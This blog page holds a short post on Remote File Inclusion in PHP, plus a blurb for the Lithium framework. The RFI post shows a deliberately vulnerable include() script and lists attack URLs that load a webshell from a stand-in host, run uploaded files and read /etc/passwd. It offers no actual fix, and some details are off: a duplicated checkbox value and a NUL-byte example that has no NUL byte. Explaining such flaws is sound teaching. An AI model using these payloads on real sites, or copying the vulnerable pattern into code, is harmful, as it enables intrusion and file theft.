Friends

How to avoid RFI vulnerability in PHP.

4:48 AM  Sandip  No comments

What is RFI?
Remote File Inclusion (RFI) is a type of vulnerability. It allows an attacker to include a remote file, usually through a script on the web server.
In PHP there are functions available like "include" and "require" to include the files in current executing script. The vulnerability occurs due to the use of user-supplied input without proper validation.

Example
Consider below script
<?php
   $file = 'file1';
   if (isset( $_GET['FILE'] ) )
      $file = $_GET['FILE'];
   include( $file . '.php' );
?>
<html>
<body>
<form method="get">
   <input type="checkbox" name="FILE" value="file1"> File 1
   <input type="checkbox" name="FILE" value="file1"> File 2
   <input type="submit">
</form>
</body>
</html>

The developer intended only file1.php and file2.php to be used as options. But as anyone can easily insert arbitrary values in FILE, it is possible to inject code from files:
  • /vulnerable.php?FILE=http://evil.example.com/webshell.txt? - injects a remotely hosted file containing a malicious code.
  • /vulnerable.php?FILE=C:\\ftp\\upload\\exploit - Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability)
  • /vulnerable.php?FILE=C:\\notes.txt - example using NUL meta character to remove the .php suffix, allowing access to files other than .php. (With magic_quotes_gpc enabled this limits the attack by escaping special characters, this disables the use of the NUL terminator)
  • /vulnerable.php?FILE=/etc/passwd - allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.
I think this information will help PHP programmers to handle RFI vulnerability at some extent.

Read More

Lithium, the most RAD framework for PHP 5.3+

4:10 AM  Sandip  No comments

Lithium, the most RAD framework for PHP 5.3+ is focused on quality, speed, and flexibility. It's a set of no-nonsense philosophies and tools that enable you to build better applications, in less time, without sacrificing quality or extensibility.
Lithium understands distributed storage and caching, queuing systems, micro-dispatch frameworks, with integrated support for document oriented databases like CouchDB and MongoDB, alongside relational databases like MySQL and PostgreSQL.
Lithium's architecture allows you to get your application up and running quickly, and still allows you to take control of the framework to support the requirements of your application.

Check this out for more info

Read More
Twitter Delicious Facebook Digg Stumbleupon Favorites More